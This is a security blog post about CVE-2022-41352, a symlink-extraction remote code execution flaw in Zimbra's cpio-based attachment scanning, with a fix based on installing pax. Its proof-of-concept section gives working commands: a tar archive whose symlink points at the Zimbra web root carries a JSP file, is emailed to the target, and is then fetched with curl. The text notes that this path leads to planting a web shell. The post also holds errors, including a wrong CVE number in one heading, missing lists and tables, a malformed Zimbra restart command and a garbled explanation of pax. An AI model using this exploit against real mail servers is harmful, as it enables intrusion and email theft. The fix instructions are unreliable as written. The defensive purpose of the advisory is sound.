How to Fix CVE-2022-41352- A Critical RCE Vulnerability In Zimbra Mail Servers

Security researchers from Rapid7, a known security firm, uncover a new vulnerability in Zimbra Mail Servers. The vulnerability tracked with the CVE ID CVE-2022-41352 is a critical-severity vulnerability with a CVSS score of 9.8 out of 10. Since the vulnerability allows a remote attacker to perform an arbitrary code execution attack on a vulnerable Zimbra instance without requiring any prior authentication, it is important to fix the CVE-2022-41352 vulnerability at the earliest. We have created this post to let you know how to fix CVE-2022-41352, a critical RCE vulnerability In Zimbra Mail Servers.

About Zimbra:

Open Source Email and Collaboration.

Zimbra is an open-source server and client technology for next-generation enterprise messaging and collaboration. Available in both on-premises and cloud deployment models, Zimbra provides users with a modern, feature-rich email experience that includes calendaring, tasks, contacts, document collaboration, social networking features, and much more.

Zimbra is used by some of the largest organizations in the world, including Comcast, T-Mobile, IBM, Yahoo!, and many others.

Zimbra is developed by a team of passionate engineers located around the globe and is available in over 25 languages.

Zimbra offers two different editions: the Network Edition and the Open Source Edition. The Network Edition provides additional features and support options not available in the Open Source Edition.

The following table outlines the key differences between the two editions:

Summary Of CVE-2022-41352:

This is a Remote Code Execution vulnerability discovered in Cpio utility, a 3rd party tool used in Zimbra to extract archived attachments that come in the email attachment. The flaw allows a remote attacker to carry out an arbitrary code execution attack on a vulnerable Zimbra instance without requiring any prior authentication. If you ignore fixing the flaw, the attackers may abuse the flaw to access every single email sent and received on a compromised email server. With this access, attackers can gain access to even more sensitive internal services of an organization. The flaw can be exploited by sending an email with malicious attachment to the vulnerable Zimbra Mail Server.

The flaw has been tracked under the identifier CVE-2022-41352 is a critical vulnerability with a base score of 9.8 on the CVSS scale. According to the research team, the flaw has been exploited in the wild since early September 2022. So, we recommend fixing the CVE-2022-41352 vulnerability at the earliest. 

Technical Details About CVE-2022-41352

As you know, Zimbra uses the Cpio utility to extract archives received from incoming emails. Zimbra extracts archives to examine virus and spam detection. The issue lies in the detection of malicious archives created using symbolic links. Attackers abuse this vulnerability and extract a symbolic link that points outside of the extraction directory and then dereference it with a second file. Please read the report for more technical details. This symbolic link vulnerability will give way to a Remote Code Execution vulnerability in Zimbra Mail Server. The best mechanism to defeat this symbolic link bypass vulnerability is to check both the Absolute and Relative Symbolic Paths in the extract and neutralize them before forwarding them to the next process.

To exploit this vulnerability, an attacker would email a .cpio, .tar, or .rpm to an affected server. When Amavis inspects it for malware, it uses cpio to extract the file. Since cpio has no mode where it can be securely used on untrusted files, the attacker can write to any path on the filesystem that the Zimbra user can access. The most likely outcome is for the attacker to plant a shell in the web root to gain Remote Code Execution, although other avenues likely exist.-Rapod 7

Zimbra Versions Affected By CVE-2022-30333

This Remote Code Execution vulnerability was not directly related to Zimbra Mail Server as long as the deployment didn’t include the Cpio archive package. The flaw affects only if Cpio is installed on the Zimbra server. Since the vulnerability is due to the method (cpio) in which Zimbra’s antivirus engine (Amavis) scans inbound emails. 

Your deployment is considered vulnerable only if these two conditions are met:

The flaw most likely affects RedHat base Linux distributions since Pax is not included in the default package list on Red Hat-based distributions. Well, in the case of Ubuntu-based distributions, it is quite not the case. Ubuntu has Pax in its default installation package. So, where there is a Pax, the system is considered not prone to vulnerability. The rapid 7 team has tested all the well-known Linux distributions and published this list. 

How Can You Check Your Zimbra Mail Server is Vulnerable (PoC)?

Create a simple “Hello World” Jsp script in the web root, as shown here. If your Jsp runs and prints “Hello World” like here, your server is vulnerable.

$ sudo mkdir -p /opt/zimbra/jetty_base/webapps/zimbra/public
$ sudo chown ron.ron /opt/zimbra/jetty_base/webapps/zimbra/public
$ ln -s /opt/zimbra/jetty_base/webapps/zimbra/public ./akbdemo
$ echo '<% out.println("Hello world!"); %>' > akbdemo/akbtest.jsp
$ tar -cf akbdemo.tar akbdemo akbdemo/akbtest.jsp
$ tar -tvf akbdemo.tar
lrwxrwxrwx ron/ron           0 2022-10-06 09:25 akbdemo -> /opt/zimbra/jetty_base/webapps/zimbra/public
-rw-r--r-- ron/ron          35 2022-10-06 09:26 akbdemo/akbtest.jsp

[Email akbtest.tar to the target Zimbra server]

$ curl -k 'https://172.16.166.158/public/akbtest.jsp'
Hello world

How to Fix CVE-2022-41352- A Critical RCE Vulnerability In Zimbra Mail Servers?

Well, there is no official patch has been released by Zimbra to fix this issue permanently. However, it has responded to the flaw by stating it will release a fix may be in its next patch cycle, but not committed to any timeline to release the patch. In its upcoming fix, Zimbra is going to replace Pax utility instead of Cpio. So we recommend doing that manually until there is an official patch released

Install the Pax utility on your Zimbra Mail Servers and restart the services. It is very important to make sure that the pax package is installed on all of your Zimbra servers. Pax is required by Amavis to read compressed attachments for virus scanning, as it does not support web archive (WAR) files.

Suppose you leave the flaw unactioned and don’t install the Pax package. In that case, Amavis will use Cpio as its default archive extractor, and that again lets an unauthenticated attacker create and overwrite files on the Zimbra server, including the Zimbra webroot.

See these commands to install Pax on various Linux distributions:

Ubuntu: 

$ apt install pax

CentOS 7 and derivatives: 

$ yum install Pax

CentOS 8 and derivatives: 

$ dnf install spax

Restart Zimbra using: 

$ sudo su zimbra -zmcontrol restart

We hope this post would help you know how to fix CVE-2022-41352, a critical RCE vulnerability In Zimbra Mail Servers. Please share this post and help to secure the digital world. Visit our social media page on Facebook, LinkedIn, Twitter, Telegram, Tumblr, Medium & Instagram, and subscribe to receive updates like this.